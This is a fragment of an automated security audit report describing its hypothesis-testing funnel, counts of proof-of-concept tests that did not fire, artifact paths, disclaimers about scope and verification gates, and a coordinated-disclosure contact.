Non-fire accounting25 hypotheses were tested but the PoC did not fire — 22× rejected, 3× new. These are hypotheses where Layer 1 / Layer 1.5 returned a verdict but the Layer 2 PoC author either declined to produce a test (no plausible attack) or the test ran without an abort in the target module.

Cycle wall-clock5h 33m 35s

§ B.1 — Cycle funnel. Hypotheses tested → PoC fires → Layer 2.5 judge filters out artifactual / mis-invariant fires → surviving STRONG fires cluster by code site → cluster representatives become published findings.

C — Audit artifacts

All cycle artifacts are persisted on disk and verifiable independently of this report. The table below lists the canonical paths under the cycle workspace so a reviewer can re-execute every layer or recompute the cycle Merkle root.

D — Disclaimers

Findings in this report reflect the state of the engine source at the commit hash on the cover page. Subsequent changes to the codebase are not analyzed. The report is not a guarantee of code correctness or security: it documents invariants that fired (or held) under the hypothesis library applied during this cycle. Out-of-scope items are listed in §00.1 (Scope).

§03 reflects bundle-level state. A row is treated as a confirmed finding when the bundle’s machine verification gates (PoC fails pre-patch + PoC passes post-patch + tests still pass) all hold, even if the Layer 2.5 LLM judge initially classified the fire as SOFT / FALSE / LOST — the verifier’s empirical patch-defuses-bug evidence supersedes the judge. Rows that did not reach a confirmed lifecycle state are retained in §03 as audit-trail evidence but are not published findings; the authoritative set is whatever appears in §01.

Communication channel: security@jelleo.com (PGP key on jelleo.com/security.html). Coordinated disclosure follows the timeline published in our security policy; pre-disclosure leak protections are enforced at the report level (the --public renderer suppresses confirmed-but-not-disclosed findings).

Methodology spec: docs/methodology/ · Live reference: jelleo.com/methodology.html · Source: github.com/Copenhagen0x/audit-pipeline-cli